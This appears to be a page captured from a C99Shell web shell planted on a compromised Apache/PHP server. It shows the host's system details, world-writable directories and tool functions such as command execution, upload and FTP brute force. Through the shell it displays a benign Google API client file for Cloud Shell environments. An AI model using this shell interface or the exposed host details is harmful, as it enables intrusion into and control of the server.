!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/CloudShell/Resource/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     UsersEnvironments.php (5.4 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

/**
 * The "environments" collection of methods.
 * Typical usage is:
 *  <code>
 *   $cloudshellService = new Google_Service_CloudShell(...);
 *   $environments = $cloudshellService->environments;
 *  </code>
 */
class Google_Service_CloudShell_Resource_UsersEnvironments extends Google_Service_Resource
{
  
/**
   * Adds a public SSH key to an environment, allowing clients with the
   * corresponding private key to connect to that environment via SSH. If a key
   * with the same content already exists, this will error with ALREADY_EXISTS.
   * (environments.addPublicKey)
   *
   * @param string $environment Environment this key should be added to, e.g.
   * `users/me/environments/default`.
   * @param Google_Service_CloudShell_AddPublicKeyRequest $postBody
   * @param array $optParams Optional parameters.
   * @return Google_Service_CloudShell_Operation
   */
  
public function addPublicKey($environmentGoogle_Service_CloudShell_AddPublicKeyRequest $postBody$optParams = array())
  {
    
$params = array('environment' => $environment'postBody' => $postBody);
    
$params array_merge($params$optParams);
    return 
$this->call('addPublicKey', array($params), "Google_Service_CloudShell_Operation");
  }
  
/**
   * Sends OAuth credentials to a running environment on behalf of a user. When
   * this completes, the environment will be authorized to run various Google
   * Cloud command line tools without requiring the user to manually authenticate.
   * (environments.authorize)
   *
   * @param string $name Name of the resource that should receive the credentials,
   * for example `users/me/environments/default` or
   * `users/someone@example.com/environments/default`.
   * @param Google_Service_CloudShell_AuthorizeEnvironmentRequest $postBody
   * @param array $optParams Optional parameters.
   * @return Google_Service_CloudShell_Operation
   */
  
public function authorize($nameGoogle_Service_CloudShell_AuthorizeEnvironmentRequest $postBody$optParams = array())
  {
    
$params = array('name' => $name'postBody' => $postBody);
    
$params array_merge($params$optParams);
    return 
$this->call('authorize', array($params), "Google_Service_CloudShell_Operation");
  }
  
/**
   * Gets an environment. Returns NOT_FOUND if the environment does not exist.
   * (environments.get)
   *
   * @param string $name Required. Name of the requested resource, for example
   * `users/me/environments/default` or
   * `users/someone@example.com/environments/default`.
   * @param array $optParams Optional parameters.
   * @return Google_Service_CloudShell_Environment
   */
  
public function get($name$optParams = array())
  {
    
$params = array('name' => $name);
    
$params array_merge($params$optParams);
    return 
$this->call('get', array($params), "Google_Service_CloudShell_Environment");
  }
  
/**
   * Removes a public SSH key from an environment. Clients will no longer be able
   * to connect to the environment using the corresponding private key. If a key
   * with the same content is not present, this will error with NOT_FOUND.
   * (environments.removePublicKey)
   *
   * @param string $environment Environment this key should be removed from, e.g.
   * `users/me/environments/default`.
   * @param Google_Service_CloudShell_RemovePublicKeyRequest $postBody
   * @param array $optParams Optional parameters.
   * @return Google_Service_CloudShell_Operation
   */
  
public function removePublicKey($environmentGoogle_Service_CloudShell_RemovePublicKeyRequest $postBody$optParams = array())
  {
    
$params = array('environment' => $environment'postBody' => $postBody);
    
$params array_merge($params$optParams);
    return 
$this->call('removePublicKey', array($params), "Google_Service_CloudShell_Operation");
  }
  
/**
   * Starts an existing environment, allowing clients to connect to it. The
   * returned operation will contain an instance of StartEnvironmentMetadata in
   * its metadata field. Users can wait for the environment to start by polling
   * this operation via GetOperation. Once the environment has finished starting
   * and is ready to accept connections, the operation will contain a
   * StartEnvironmentResponse in its response field. (environments.start)
   *
   * @param string $name Name of the resource that should be started, for example
   * `users/me/environments/default` or
   * `users/someone@example.com/environments/default`.
   * @param Google_Service_CloudShell_StartEnvironmentRequest $postBody
   * @param array $optParams Optional parameters.
   * @return Google_Service_CloudShell_Operation
   */
  
public function start($nameGoogle_Service_CloudShell_StartEnvironmentRequest $postBody$optParams = array())
  {
    
$params = array('name' => $name'postBody' => $postBody);
    
$params array_merge($params$optParams);
    return 
$this->call('start', array($params), "Google_Service_CloudShell_Operation");
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--